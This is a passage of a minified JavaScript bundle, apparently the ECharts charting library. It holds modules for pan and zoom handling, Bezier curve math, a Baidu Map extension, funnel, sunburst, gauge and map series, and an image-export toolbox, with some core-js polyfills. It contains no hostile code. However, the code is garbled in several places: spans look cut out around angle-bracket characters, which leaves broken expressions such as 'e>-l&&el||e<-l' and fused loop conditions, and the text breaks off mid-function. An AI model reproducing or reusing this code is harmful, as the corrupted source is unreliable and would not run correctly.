t=i.bind,n=t(l,this),o=t(u,this),a=t(c,this),s=t(h,this),f=t(d,this);r.call(this),this.setPointerChecker=function(e){this.pointerChecker=e},this.enable=function(t,r){this.disable(),this._opt=i.defaults(i.clone(r)||{},{zoomOnMouseWheel:!0,moveOnMouseMove:!0,moveOnMouseWheel:!1,preventDefaultMouseMove:!0}),null==t&&(t=!0),!0!==t&&"move"!==t&&"pan"!==t||(e.on("mousedown",n),e.on("mousemove",o),e.on("mouseup",a)),!0!==t&&"scale"!==t&&"zoom"!==t||(e.on("mousewheel",s),e.on("pinch",f))},this.disable=function(){e.off("mousedown",n),e.off("mousemove",o),e.off("mouseup",a),e.off("mousewheel",s),e.off("pinch",f)},this.dispose=this.disable,this.isDragging=function(){return this._dragging},this.isPinching=function(){return this._pinching}}function l(e){if(!(o.isMiddleOrRightButtonOnMouseUpDown(e)||e.target&&e.target.draggable)){var t=e.offsetX,n=e.offsetY;this.pointerChecker&&this.pointerChecker(e,t,n)&&(this._x=t,this._y=n,this._dragging=!0)}}function u(e){if(this._dragging&&g("moveOnMouseMove",e,this._opt)&&"pinch"!==e.gestureEvent&&!a.isTaken(this._zr,"globalPan")){var t=e.offsetX,n=e.offsetY,i=this._x,r=this._y,s=t-i,l=n-r;this._x=t,this._y=n,this._opt.preventDefaultMouseMove&&o.stop(e.event),p(this,"pan","moveOnMouseMove",e,{dx:s,dy:l,oldX:i,oldY:r,newX:t,newY:n})}}function c(e){o.isMiddleOrRightButtonOnMouseUpDown(e)||(this._dragging=!1)}function h(e){var t=g("zoomOnMouseWheel",e,this._opt),n=g("moveOnMouseWheel",e,this._opt),i=e.wheelDelta,r=Math.abs(i),o=e.offsetX,a=e.offsetY;if(0!==i&&(t||n)){if(t){var s=r>3?1.4:r>1?1.2:1.1,l=i>0?s:1/s;f(this,"zoom","zoomOnMouseWheel",e,{scale:l,originX:o,originY:a})}if(n){var u=Math.abs(i),c=(i>0?1:-1)*(u>3?.4:u>1?.15:.05);f(this,"scrollMove","moveOnMouseWheel",e,{scrollDelta:c,originX:o,originY:a})}}}function d(e){if(!a.isTaken(this._zr,"globalPan")){var t=e.pinchScale>1?1.1:1/1.1;f(this,"zoom",null,e,{scale:t,originX:e.pinchX,originY:e.pinchY})}}function f(e,t,n,i,r){e.pointerChecker&&e.pointerChecker(i,r.originX,r.originY)&&(o.stop(i.event),p(e,t,n,i,r))}function p(e,t,n,r,o){o.isAvailableBehavior=i.bind(g,null,n,r),e.trigger(t,o)}function g(e,t,n){var r=n[e];return!e||r&&(!i.isString(r)||t.event[r+"Key"])}i.mixin(s,r);var m=s;e.exports=m},"4a3f":function(e,t,n){var i=n("401b"),r=i.create,o=i.distSquare,a=Math.pow,s=Math.sqrt,l=1e-8,u=1e-4,c=s(3),h=1/3,d=r(),f=r(),p=r();function g(e){return e>-l&&el||e<-l}function v(e,t,n,i,r){var o=1-r;return o*o*(o*e+3*r*t)+r*r*(r*i+3*o*n)}function y(e,t,n,i,r){var o=1-r;return 3*(((t-e)*o+2*(n-t)*r)*o+(i-n)*r*r)}function _(e,t,n,i,r,o){var l=i+3*(t-n)-e,u=3*(n-2*t+e),d=3*(t-e),f=e-r,p=u*u-3*l*d,m=u*d-9*l*f,v=d*d-3*u*f,y=0;if(g(p)&&g(m))if(g(u))o[0]=0;else{var _=-d/u;_>=0&&_<=1&&(o[y++]=_)}else{var b=m*m-4*p*v;if(g(b)){var x=m/p,w=(_=-u/l+x,-x/2);_>=0&&_<=1&&(o[y++]=_),w>=0&&w<=1&&(o[y++]=w)}else if(b>0){var k=s(b),S=p*u+1.5*l*(-m+k),M=p*u+1.5*l*(-m-k);S=S<0?-a(-S,h):a(S,h),M=M<0?-a(-M,h):a(M,h);_=(-u-(S+M))/(3*l);_>=0&&_<=1&&(o[y++]=_)}else{var A=(2*p*u-3*l*m)/(2*s(p*p*p)),C=Math.acos(A)/3,T=s(p),I=Math.cos(C),D=(_=(-u-2*T*I)/(3*l),w=(-u+T*(I+c*Math.sin(C)))/(3*l),(-u+T*(I-c*Math.sin(C)))/(3*l));_>=0&&_<=1&&(o[y++]=_),w>=0&&w<=1&&(o[y++]=w),D>=0&&D<=1&&(o[y++]=D)}}return y}function b(e,t,n,i,r){var o=6*n-12*t+6*e,a=9*t+3*i-3*e-9*n,l=3*t-3*e,u=0;if(g(a)){if(m(o)){var c=-l/o;c>=0&&c<=1&&(r[u++]=c)}}else{var h=o*o-4*a*l;if(g(h))r[0]=-o/(2*a);else if(h>0){var d=s(h),f=(c=(-o+d)/(2*a),(-o-d)/(2*a));c>=0&&c<=1&&(r[u++]=c),f>=0&&f<=1&&(r[u++]=f)}}return u}function x(e,t,n,i,r,o){var a=(t-e)*r+e,s=(n-t)*r+t,l=(i-n)*r+n,u=(s-a)*r+a,c=(l-s)*r+s,h=(c-u)*r+u;o[0]=e,o[1]=a,o[2]=u,o[3]=h,o[4]=h,o[5]=c,o[6]=l,o[7]=i}function w(e,t,n,i,r,a,l,c,h,g,m){var y,_,b,x,w,k=.005,S=1/0;d[0]=h,d[1]=g;for(var M=0;M<1;M+=.05)f[0]=v(e,n,r,l,M),f[1]=v(t,i,a,c,M),x=o(d,f),x=0&&x=0&&c<=1&&(r[u++]=c)}}else{var h=a*a-4*o*l;if(g(h)){c=-a/(2*o);c>=0&&c<=1&&(r[u++]=c)}else if(h>0){var d=s(h),f=(c=(-a+d)/(2*o),(-a-d)/(2*o));c>=0&&c<=1&&(r[u++]=c),f>=0&&f<=1&&(r[u++]=f)}}return u}function A(e,t,n){var i=e+n-2*t;return 0===i?.5:(e-t)/i}function C(e,t,n,i,r){var o=(t-e)*i+e,a=(n-t)*i+t,s=(a-o)*i+o;r[0]=e,r[1]=o,r[2]=s,r[3]=s,r[4]=a,r[5]=n}function T(e,t,n,i,r,a,l,c,h){var g,m=.005,v=1/0;d[0]=l,d[1]=c;for(var y=0;y<1;y+=.05){f[0]=k(e,n,r,y),f[1]=k(t,i,a,y);var _=o(d,f);_=0&&_=0;--i)if(t[i]===e)return!0;return!1}),n):null:n[0]},g.prototype.update=function(e,t){if(e){var n=this.getDefs(!1);if(e[this._domName]&&n.contains(e[this._domName]))"function"===typeof t&&t(e);else{var i=this.add(e);i&&(e[this._domName]=i)}}},g.prototype.addDom=function(e){var t=this.getDefs(!0);t.appendChild(e)},g.prototype.removeDom=function(e){var t=this.getDefs(!1);t&&e[this._domName]&&(t.removeChild(e[this._domName]),e[this._domName]=null)},g.prototype.getDoms=function(){var e=this.getDefs(!1);if(!e)return[];var t=[];return o.each(this._tagNames,(function(n){var i=e.getElementsByTagName(n);t=t.concat([].slice.call(i))})),t},g.prototype.markAllUnused=function(){var e=this.getDoms(),t=this;o.each(e,(function(e){e[t._markLabel]=f}))},g.prototype.markUsed=function(e){e&&(e[this._markLabel]=p)},g.prototype.removeUnused=function(){var e=this.getDefs(!1);if(e){var t=this.getDoms(),n=this;o.each(t,(function(t){t[n._markLabel]!==p&&e.removeChild(t)}))}},g.prototype.getSvgProxy=function(e){return e instanceof a?c:e instanceof s?h:e instanceof l?d:c},g.prototype.getTextSvgElement=function(e){return e.__textSvgEl},g.prototype.getSvgElement=function(e){return e.__svgEl};var m=g;e.exports=m},"4ae9":function(e,t,n){var i,r=n("313e"),o=r.util,a=r.graphic,s=r.matrix;function l(e,t){this._bmap=e,this.dimensions=["lng","lat"],this._mapOffset=[0,0],this._api=t,this._projection=new BMap.MercatorProjection}function u(e,t){return t=t||[0,0],o.map([0,1],(function(n){var i=t[n],r=e[n]/2,o=[],a=[];return o[n]=i-r,a[n]=i+r,o[1-n]=a[1-n]=t[1-n],Math.abs(this.dataToPoint(o)[n]-this.dataToPoint(a)[n])}),this)}function c(){function e(e){this._root=e}return e.prototype=new BMap.Overlay,e.prototype.initialize=function(e){return e.getPanes().labelPane.appendChild(this._root),this._root},e.prototype.draw=function(){},e}l.prototype.dimensions=["lng","lat"],l.prototype.setZoom=function(e){this._zoom=e},l.prototype.setCenter=function(e){this._center=this._projection.lngLatToPoint(new BMap.Point(e[0],e[1]))},l.prototype.setMapOffset=function(e){this._mapOffset=e},l.prototype.getBMap=function(){return this._bmap},l.prototype.dataToPoint=function(e){var t=new BMap.Point(e[0],e[1]),n=this._bmap.pointToOverlayPixel(t),i=this._mapOffset;return[n.x-i[0],n.y-i[1]]},l.prototype.pointToData=function(e){var t=this._mapOffset;e=this._bmap.overlayPixelToPoint({x:e[0]+t[0],y:e[1]+t[1]});return[e.lng,e.lat]},l.prototype.getViewRect=function(){var e=this._api;return new a.BoundingRect(0,0,e.getWidth(),e.getHeight())},l.prototype.getRoamTransform=function(){return s.create()},l.prototype.prepareCustoms=function(e){var t=this.getViewRect();return{coordSys:{type:"bmap",x:t.x,y:t.y,width:t.width,height:t.height},api:{coord:o.bind(this.dataToPoint,this),size:o.bind(u,this)}}},l.dimensions=l.prototype.dimensions,l.create=function(e,t){var n,r=t.getDom();e.eachComponent("bmap",(function(e){var o=t.getZr().painter,a=o.getViewportRoot();if("undefined"===typeof BMap)throw new Error("BMap api is not loaded");if(i=i||c(),n)throw new Error("Only one bmap component can exist");if(!e.__bmap){var s=r.querySelector(".ec-extension-bmap");s&&(a.style.left="0px",a.style.top="0px",r.removeChild(s)),s=document.createElement("div"),s.style.cssText="width:100%;height:100%",s.classList.add("ec-extension-bmap"),r.appendChild(s);var u=e.get("mapOptions")||{};delete u.mapType;var h=e.__bmap=new BMap.Map(s,u),d=new i(a);h.addOverlay(d),o.getViewportRootOffset=function(){return{offsetLeft:0,offsetTop:0}}}h=e.__bmap;var f=e.get("center"),p=e.get("zoom");if(f&&p){var g=h.getCenter(),m=h.getZoom(),v=e.centerOrZoomChanged([g.lng,g.lat],m);if(v){var y=new BMap.Point(f[0],f[1]);h.centerAndZoom(y,p)}}n=new l(h,t),n.setMapOffset(e.__mapOffset||[0,0]),n.setZoom(p),n.setCenter(f),e.coordinateSystem=n})),e.eachSeries((function(e){"bmap"===e.get("coordinateSystem")&&(e.coordinateSystem=n)}))};var h=l;e.exports=h},"4b08":function(e,t,n){var i=n("7dcf"),r=i.extend({type:"dataZoom.select"});e.exports=r},"4b8b":function(e,t){e.exports=function(e){try{return!!e()}catch(t){return!0}}},"4bf6":function(e,t,n){var i=n("66fc"),r=n("697e"),o=n("f934"),a=o.getLayoutRect,s=n("6d8b"),l=s.each;function u(e,t,n){this.dimension="single",this.dimensions=["single"],this._axis=null,this._rect,this._init(e,t,n),this.model=e}u.prototype={type:"singleAxis",axisPointerEnabled:!0,constructor:u,_init:function(e,t,n){var o=this.dimension,a=new i(o,r.createScaleByModel(e),[0,0],e.get("type"),e.get("position")),s="category"===a.type;a.onBand=s&&e.get("boundaryGap"),a.inverse=e.get("inverse"),a.orient=e.get("orient"),e.axis=a,a.model=e,a.coordinateSystem=this,this._axis=a},update:function(e,t){e.eachSeries((function(e){if(e.coordinateSystem===this){var t=e.getData();l(t.mapDimension(this.dimension,!0),(function(e){this._axis.scale.unionExtentFromData(t,e)}),this),r.niceScaleExtent(this._axis.scale,this._axis.model)}}),this)},resize:function(e,t){this._rect=a({left:e.get("left"),top:e.get("top"),right:e.get("right"),bottom:e.get("bottom"),width:e.get("width"),height:e.get("height")},{width:t.getWidth(),height:t.getHeight()}),this._adjustAxis()},getRect:function(){return this._rect},_adjustAxis:function(){var e=this._rect,t=this._axis,n=t.isHorizontal(),i=n?[0,e.width]:[0,e.height],r=t.reverse?1:0;t.setExtent(i[r],i[1-r]),this._updateAxisTransform(t,n?e.x:e.y)},_updateAxisTransform:function(e,t){var n=e.getExtent(),i=n[0]+n[1],r=e.isHorizontal();e.toGlobalCoord=r?function(e){return e+t}:function(e){return i-e+t},e.toLocalCoord=r?function(e){return e-t}:function(e){return i-e+t}},getAxis:function(){return this._axis},getBaseAxis:function(){return this._axis},getAxes:function(){return[this._axis]},getTooltipAxes:function(){return{baseAxes:[this.getAxis()]}},containPoint:function(e){var t=this.getRect(),n=this.getAxis(),i=n.orient;return"horizontal"===i?n.contain(n.toLocalCoord(e[0]))&&e[1]>=t.y&&e[1]<=t.y+t.height:n.contain(n.toLocalCoord(e[1]))&&e[0]>=t.y&&e[0]<=t.y+t.height},pointToData:function(e){var t=this.getAxis();return[t.coordToData(t.toLocalCoord(e["horizontal"===t.orient?0:1]))]},dataToPoint:function(e){var t=this.getAxis(),n=this.getRect(),i=[],r="horizontal"===t.orient?0:1;return e instanceof Array&&(e=e[0]),i[r]=t.toGlobalCoord(t.dataToCoord(+e)),i[1-r]=0===r?n.y+n.height/2:n.x+n.width/2,i}};var c=u;e.exports=c},"4c86":function(e,t,n){var i=n("6d8b"),r=i.each,o=n("bda7"),a=n("e0d3"),s=a.makeInner,l=n("320a"),u=n("1792"),c=n("6bd4"),h=n("a7f2"),d=s(),f={load:function(e,t,n){var i=d(t).parsed;if(i)return i;var a,s=t.specialAreas||{},f=t.geoJSON;try{a=f?o(f,n):[]}catch(g){throw new Error("Invalid geoJson format\n"+g.message)}return l(e,a),r(a,(function(t){var n=t.name;u(e,t),c(e,t),h(e,t);var i=s[n];i&&t.transformTo(i.left,i.top,i.width,i.height)})),d(t).parsed={regions:a,boundingRect:p(a)}}};function p(e){for(var t,n=0;n0?a:s)}function c(e,t){return t.get(e>0?r:o)}}};e.exports=l},"4d20":function(e,t,n){var i=n("1917"),r=n("10db"),o=n("6ca1"),a=n("3397"),s=n("9c0e"),l=n("faf5"),u=Object.getOwnPropertyDescriptor;t.f=n("0bad")?u:function(e,t){if(e=o(e),t=a(t,!0),l)try{return u(e,t)}catch(n){}if(s(e,t))return r(!i.f.call(e,t),e[t])}},"4d62":function(e,t,n){var i=n("2306"),r=n("6d8b"),o=n("e887");function a(e,t){i.Group.call(this);var n=new i.Polygon,r=new i.Polyline,o=new i.Text;this.add(n),this.add(r),this.add(o),this.highDownOnUpdate=function(e,t){"emphasis"===t?(r.ignore=r.hoverIgnore,o.ignore=o.hoverIgnore):(r.ignore=r.normalIgnore,o.ignore=o.normalIgnore)},this.updateData(e,t,!0)}var s=a.prototype,l=["itemStyle","opacity"];s.updateData=function(e,t,n){var o=this.childAt(0),a=e.hostModel,s=e.getItemModel(t),u=e.getItemLayout(t),c=e.getItemModel(t).get(l);c=null==c?1:c,o.useStyle({}),n?(o.setShape({points:u.points}),o.setStyle({opacity:0}),i.initProps(o,{style:{opacity:c}},a,t)):i.updateProps(o,{style:{opacity:c},shape:{points:u.points}},a,t);var h=s.getModel("itemStyle"),d=e.getItemVisual(t,"color");o.setStyle(r.defaults({lineJoin:"round",fill:d},h.getItemStyle(["opacity"]))),o.hoverStyle=h.getModel("emphasis").getItemStyle(),this._updateLabel(e,t),i.setHoverStyle(this)},s._updateLabel=function(e,t){var n=this.childAt(1),r=this.childAt(2),o=e.hostModel,a=e.getItemModel(t),s=e.getItemLayout(t),l=s.label,u=e.getItemVisual(t,"color");i.updateProps(n,{shape:{points:l.linePoints||l.linePoints}},o,t),i.updateProps(r,{style:{x:l.x,y:l.y}},o,t),r.attr({rotation:l.rotation,origin:[l.x,l.y],z2:10});var c=a.getModel("label"),h=a.getModel("emphasis.label"),d=a.getModel("labelLine"),f=a.getModel("emphasis.labelLine");u=e.getItemVisual(t,"color");i.setLabelStyle(r.style,r.hoverStyle={},c,h,{labelFetcher:e.hostModel,labelDataIndex:t,defaultText:e.getName(t),autoColor:u,useInsideStyle:!!l.inside},{textAlign:l.textAlign,textVerticalAlign:l.verticalAlign}),r.ignore=r.normalIgnore=!c.get("show"),r.hoverIgnore=!h.get("show"),n.ignore=n.normalIgnore=!d.get("show"),n.hoverIgnore=!f.get("show"),n.setStyle({stroke:u}),n.setStyle(d.getModel("lineStyle").getLineStyle()),n.hoverStyle=f.getModel("lineStyle").getLineStyle()},r.inherits(a,i.Group);var u=o.extend({type:"funnel",render:function(e,t,n){var i=e.getData(),r=this._data,o=this.group;i.diff(r).add((function(e){var t=new a(i,e);i.setItemGraphicEl(e,t),o.add(t)})).update((function(e,t){var n=r.getItemGraphicEl(t);n.updateData(i,e),o.add(n),i.setItemGraphicEl(e,n)})).remove((function(e){var t=r.getItemGraphicEl(e);o.remove(t)})).execute(),this._data=i},remove:function(){this.group.removeAll(),this._data=null},dispose:function(){}}),c=u;e.exports=c},"4d63":function(e,t,n){var i=n("83ab"),r=n("da84"),o=n("94ca"),a=n("7156"),s=n("9bf2").f,l=n("241c").f,u=n("44e7"),c=n("ad6d"),h=n("9f7f"),d=n("6eeb"),f=n("d039"),p=n("69f3").set,g=n("2626"),m=n("b622"),v=m("match"),y=r.RegExp,_=y.prototype,b=/a/g,x=/a/g,w=new y(b)!==b,k=h.UNSUPPORTED_Y,S=i&&o("RegExp",!w||k||f((function(){return x[v]=!1,y(b)!=b||y(x)==x||"/a/i"!=y(b,"i")})));if(S){var M=function(e,t){var n,i=this instanceof M,r=u(e),o=void 0===t;if(!i&&r&&e.constructor===M&&o)return e;w?r&&!o&&(e=e.source):e instanceof M&&(o&&(t=c.call(e)),e=e.source),k&&(n=!!t&&t.indexOf("y")>-1,n&&(t=t.replace(/y/g,"")));var s=a(w?new y(e,t):y(e,t),i?this:_,M);return k&&n&&p(s,{sticky:n}),s},A=function(e){e in M||s(M,e,{configurable:!0,get:function(){return y[e]},set:function(t){y[e]=t}})},C=l(y),T=0;while(C.length>T)A(C[T++]);_.constructor=M,M.prototype=_,d(r,"RegExp",M)}g("RegExp")},"4d64":function(e,t,n){var i=n("fc6a"),r=n("50c4"),o=n("23cb"),a=function(e){return function(t,n,a){var s,l=i(t),u=r(l.length),c=o(a,u);if(e&&n!=n){while(u>c)if(s=l[c++],s!=s)return!0}else for(;u>c;c++)if((e||c in l)&&l[c]===n)return e||c||0;return!e&&-1}};e.exports={includes:a(!0),indexOf:a(!1)}},"4d85":function(e,t,n){var i=n("e46b"),r=n("4f85"),o=r.extend({type:"series.gauge",getInitialData:function(e,t){return i(this,["value"])},defaultOption:{zlevel:0,z:2,center:["50%","50%"],legendHoverLink:!0,radius:"75%",startAngle:225,endAngle:-45,clockwise:!0,min:0,max:100,splitNumber:10,axisLine:{show:!0,lineStyle:{color:[[.2,"#91c7ae"],[.8,"#63869e"],[1,"#c23531"]],width:30}},splitLine:{show:!0,length:30,lineStyle:{color:"#eee",width:2,type:"solid"}},axisTick:{show:!0,splitNumber:5,length:8,lineStyle:{color:"#eee",width:1,type:"solid"}},axisLabel:{show:!0,distance:5,color:"auto"},pointer:{show:!0,length:"80%",width:8},itemStyle:{color:"auto"},title:{show:!0,offsetCenter:[0,"-40%"],color:"#333",fontSize:15},detail:{show:!0,backgroundColor:"rgba(0,0,0,0)",borderWidth:0,borderColor:"#ccc",width:100,height:null,padding:[5,10],offsetCenter:[0,"40%"],color:"auto",fontSize:30}}}),a=o;e.exports=a},"4d88":function(e,t){var n={}.toString;e.exports=function(e){return n.call(e).slice(8,-1)}},"4de4":function(e,t,n){"use strict";var i=n("23e7"),r=n("b727").filter,o=n("1dde"),a=n("ae40"),s=o("filter"),l=a("filter");i({target:"Array",proto:!0,forced:!s||!l},{filter:function(e){return r(this,e,arguments.length>1?arguments[1]:void 0)}})},"4df4":function(e,t,n){"use strict";var i=n("0366"),r=n("7b0b"),o=n("9bdd"),a=n("e95a"),s=n("50c4"),l=n("8418"),u=n("35a1");e.exports=function(e){var t,n,c,h,d,f,p=r(e),g="function"==typeof this?this:Array,m=arguments.length,v=m>1?arguments[1]:void 0,y=void 0!==v,_=u(p),b=0;if(y&&(v=i(v,m>2?arguments[2]:void 0,2)),void 0==_||g==Array&&a(_))for(t=s(p.length),n=new g(t);t>b;b++)f=y?v(p[b],b):p[b],l(n,b,f);else for(h=_.call(p),d=h.next,n=new g;!(c=d.call(h)).done;b++)f=y?o(h,v,[c.value,b],!0):c.value,l(n,b,f);return n.length=b,n}},"4e08":function(e,t,n){(function(e){var n;"undefined"!==typeof window?n=window.__DEV__:"undefined"!==typeof e&&(n=e.__DEV__),"undefined"===typeof n&&(n=!0);var i=n;t.__DEV__=i}).call(this,n("c8ba"))},"4e10":function(e,t,n){var i=n("6d8b"),r=n("e46b"),o=n("4f85"),a=n("eda2"),s=a.encodeHTML,l=a.addCommas,u=n("7023"),c=n("2b17"),h=c.retrieveRawAttr,d=n("5b87"),f=n("0f99"),p=f.makeSeriesEncodeForNameBased,g=o.extend({type:"series.map",dependencies:["geo"],layoutMode:"box",needsDrawMap:!1,seriesGroup:[],getInitialData:function(e){for(var t=r(this,{coordDimensions:["value"],encodeDefaulter:i.curry(p,this)}),n=t.mapDimension("value"),o=i.createHashMap(),a=[],s=[],l=0,u=t.count();l":"\n";return c.join(", ")+p+s(a+" : "+o)},getTooltipPosition:function(e){if(null!=e){var t=this.getData().getName(e),n=this.coordinateSystem,i=n.getRegion(t);return i&&n.dataToPoint(i.center)}},setZoom:function(e){this.option.zoom=e},setCenter:function(e){this.option.center=e},defaultOption:{zlevel:0,z:2,coordinateSystem:"geo",map:"",left:"center",top:"center",aspectScale:.75,showLegendSymbol:!0,dataRangeHoverLink:!0,boundingCoords:null,center:null,zoom:1,scaleLimit:null,label:{show:!1,color:"#000"},itemStyle:{borderWidth:.5,borderColor:"#444",areaColor:"#eee"},emphasis:{label:{show:!0,color:"rgb(100,0,0)"},itemStyle:{areaColor:"rgba(255,215,0,0.8)"}},nameProperty:"name"}});i.mixin(g,u);var m=g;e.exports=m},"4e47":function(e,t,n){var i=n("6d8b"),r=n("2306"),o={NONE:"none",DESCENDANT:"descendant",ANCESTOR:"ancestor",SELF:"self"},a=2,s=4;function l(e,t,n){r.Group.call(this);var i=new r.Sector({z2:a});i.seriesIndex=t.seriesIndex;var o=new r.Text({z2:s,silent:e.getModel("label").get("silent")});function l(){o.ignore=o.hoverIgnore}function u(){o.ignore=o.normalIgnore}this.add(i),this.add(o),this.updateData(!0,e,"normal",t,n),this.on("emphasis",l).on("normal",u).on("mouseover",l).on("mouseout",u)}var u=l.prototype;u.updateData=function(e,t,n,o,a){this.node=t,t.piece=this,o=o||this._seriesModel,a=a||this._ecModel;var s=this.childAt(0);s.dataIndex=t.dataIndex;var l=t.getModel(),u=t.getLayout(),c=i.extend({},u);c.label=null;var d=h(t,o,a);p(t,o,d);var f,g=l.getModel("itemStyle").getItemStyle();if("normal"===n)f=g;else{var m=l.getModel(n+".itemStyle").getItemStyle();f=i.merge(m,g)}f=i.defaults({lineJoin:"bevel",fill:f.fill||d},f),e?(s.setShape(c),s.shape.r=u.r0,r.updateProps(s,{shape:{r:u.r}},o,t.dataIndex),s.useStyle(f)):"object"===typeof f.fill&&f.fill.type||"object"===typeof s.style.fill&&s.style.fill.type?(r.updateProps(s,{shape:c},o),s.useStyle(f)):r.updateProps(s,{shape:c,style:f},o),this._updateLabel(o,d,n);var v=l.getShallow("cursor");if(v&&s.attr("cursor",v),e){var y=o.getShallow("highlightPolicy");this._initEvents(s,t,o,y)}this._seriesModel=o||this._seriesModel,this._ecModel=a||this._ecModel,r.setHoverStyle(this)},u.onEmphasis=function(e){var t=this;this.node.hostTree.root.eachNode((function(n){n.piece&&(t.node===n?n.piece.updateData(!1,n,"emphasis"):f(n,t.node,e)?n.piece.childAt(0).trigger("highlight"):e!==o.NONE&&n.piece.childAt(0).trigger("downplay"))}))},u.onNormal=function(){this.node.hostTree.root.eachNode((function(e){e.piece&&e.piece.updateData(!1,e,"normal")}))},u.onHighlight=function(){this.updateData(!1,this.node,"highlight")},u.onDownplay=function(){this.updateData(!1,this.node,"downplay")},u._updateLabel=function(e,t,n){var o=this.node.getModel(),a=o.getModel("label"),s="normal"===n||"emphasis"===n?a:o.getModel(n+".label"),l=o.getModel("emphasis.label"),u=s.get("formatter"),c=u?n:"normal",h=i.retrieve(e.getFormattedLabel(this.node.dataIndex,c,null,null,"label"),this.node.name);!1===C("show")&&(h="");var d=this.node.getLayout(),f=s.get("minAngle");null==f&&(f=a.get("minAngle")),f=f/180*Math.PI;var p=d.endAngle-d.startAngle;null!=f&&Math.abs(p)Math.PI/2?"right":"left"):w&&"center"!==w?"left"===w?(m=d.r0+x,v>Math.PI/2&&(w="right")):"right"===w&&(m=d.r-x,v>Math.PI/2&&(w="left")):(m=(d.r+d.r0)/2,w="center"),g.attr("style",{text:h,textAlign:w,textVerticalAlign:C("verticalAlign")||"middle",opacity:C("opacity")});var k=m*y+d.cx,S=m*_+d.cy;g.attr("position",[k,S]);var M=C("rotate"),A=0;function C(e){var t=s.get(e);return null==t?a.get(e):t}"radial"===M?(A=-v,A<-Math.PI/2&&(A+=Math.PI)):"tangential"===M?(A=Math.PI/2-v,A>Math.PI/2?A-=Math.PI:A<-Math.PI/2&&(A+=Math.PI)):"number"===typeof M&&(A=M*Math.PI/180),g.attr("rotation",A)},u._initEvents=function(e,t,n,i){e.off("mouseover").off("mouseout").off("emphasis").off("normal");var r=this,o=function(){r.onEmphasis(i)},a=function(){r.onNormal()},s=function(){r.onDownplay()},l=function(){r.onHighlight()};n.isAnimationEnabled()&&e.on("mouseover",o).on("mouseout",a).on("emphasis",o).on("normal",a).on("downplay",s).on("highlight",l)},i.inherits(l,r.Group);var c=l;function h(e,t,n){var i=e.getVisual("color"),r=e.getVisual("visualMeta");r&&0!==r.length||(i=null);var o=e.getModel("itemStyle").get("color");if(o)return o;if(i)return i;if(0===e.depth)return n.option.color[0];var a=n.option.color.length;return o=n.option.color[d(e)%a],o}function d(e){var t=e;while(t.depth>1)t=t.parentNode;var n=e.getAncestors()[0];return i.indexOf(n.children,t)}function f(e,t,n){return n!==o.NONE&&(n===o.SELF?e===t:n===o.ANCESTOR?e===t||e.isAncestorOf(t):e===t||e.isDescendantOf(t))}function p(e,t,n){var i=t.getData();i.setItemVisual(e.dataIndex,"color",n)}e.exports=c},"4e71":function(e,t,n){n("e198")("observable")},"4e9f":function(e,t,n){var i=n("22d1"),r=n("29a8"),o=n("2145"),a=r.toolbox.saveAsImage;function s(e){this.model=e}s.defaultOption={show:!0,icon:"M4.7,22.9L29.3,45.5L54.7,23.4M4.6,43.6L4.6,58L53.8,58L53.8,43.6M29.2,45.1L29.2,0",title:a.title,type:"png",connectedBackgroundColor:"#fff",name:"",excludeComponents:["toolbox"],pixelRatio:1,lang:a.lang.slice()},s.prototype.unusable=!i.canvasSupported;var l=s.prototype;l.onclick=function(e,t){var n=this.model,r=n.get("name")||e.get("title.0.text")||"echarts",o="svg"===t.getZr().painter.getType(),a=o?"svg":n.get("type",!0)||"png",s=t.getConnectedDataURL({type:a,backgroundColor:n.get("backgroundColor",!0)||e.get("backgroundColor")||"#fff",connectedBackgroundColor:n.get("connectedBackgroundColor"),excludeComponents:n.get("excludeComponents"),pixelRatio:n.get("pixelRatio")});if("function"!==typeof MouseEvent||i.browser.ie||i.browser.edge)if(window.navigator.msSaveOrOpenBlob){var l=atob(s.split(",")[1]),u=l.length,c=new Uint8Array(u);while(u--)c[u]=l.charCodeAt(u);var h=new Blob([c]);window.navigator.msSaveOrOpenBlob(h,r+"."+a)}else{var d=n.get("lang"),f='',p=window.open();p.document.write(f)}else{var g=document.createElement("a");g.download=r+"."+a,g.target="_blank",g.href=s;var m=new MouseEvent("click",{view:document.defaultView,bubbles:!0,cancelable:!1});g.dispatchEvent(m)}},o.register("saveAsImage",s);var u=s;e.exports=u},"4ebc":function(e,t,n){var i=n("4d88");e.exports=Array.isArray||function(e){return"Array"==i(e)}},"4f85":function(e,t,n){var i=n("4e08"),r=(i.__DEV__,n("6d8b")),o=n("22d1"),a=n("eda2"),s=a.formatTime,l=a.encodeHTML,u=a.addCommas,c=a.getTooltipMarker,h=n("e0d3"),d=n("6cb7"),f=n("e47b"),p=n("38a2"),g=n("f934"),m=g.getLayoutParams,v=g.mergeLayoutParam,y=n("f47d"),_=y.createTask,b=n("0f99"),x=b.prepareSource,w=b.getSource,k=n("2b17"),S=k.retrieveRawValue,M=h.makeInner(),A=d.extend({type:"series.__base__",seriesIndex:0,coordinateSystem:null,defaultOption:null,legendVisualProvider:null,visualColorAccessPath:"itemStyle.color",visualBorderColorAccessPath:"itemStyle.borderColor",layoutMode:null,init:function(e,t,n,i){this.seriesIndex=this.componentIndex,this.dataTask=_({count:I,reset:D}),this.dataTask.context={model:this},this.mergeDefaultAndTheme(e,n),x(this);var r=this.getInitialData(e,n);E(r,this),this.dataTask.context.data=r,M(this).dataBeforeProcessed=r,C(this)},mergeDefaultAndTheme:function(e,t){var n=this.layoutMode,i=n?m(e):{},o=this.subType;d.hasClass(o)&&(o+="Series"),r.merge(e,t.getTheme().get(this.subType)),r.merge(e,this.getDefaultOption()),h.defaultEmphasis(e,"label",["show"]),this.fillDataTextStyle(e.data),n&&v(e,i,n)},mergeOption:function(e,t){e=r.merge(this.option,e,!0),this.fillDataTextStyle(e.data);var n=this.layoutMode;n&&v(this.option,e,n),x(this);var i=this.getInitialData(e,t);E(i,this),this.dataTask.dirty(),this.dataTask.context.data=i,M(this).dataBeforeProcessed=i,C(this)},fillDataTextStyle:function(e){if(e&&!r.isTypedArray(e))for(var t=["show"],n=0;n":"\n",d="richText"===i,f={},p=0;function g(n){var a=r.reduce(n,(function(e,t,n){var i=v.getDimensionInfo(n);return e|(i&&!1!==i.tooltip&&null!=i.displayName)}),0),h=[];function g(e,n){var r=v.getDimensionInfo(n);if(r&&!1!==r.otherDims.tooltip){var g=r.type,m="sub"+o.seriesIndex+"at"+p,y=c({color:w,type:"subItem",renderMode:i,markerId:m}),_="string"===typeof y?y:y.content,b=(a?_+l(r.displayName||"-")+": ":"")+l("ordinal"===g?e+"":"time"===g?t?"":s("yyyy/MM/dd hh:mm:ss",e):u(e));b&&h.push(b),d&&(f[m]=w,++p)}}y.length?r.each(y,(function(t){g(S(v,e,t),t)})):r.each(n,g);var 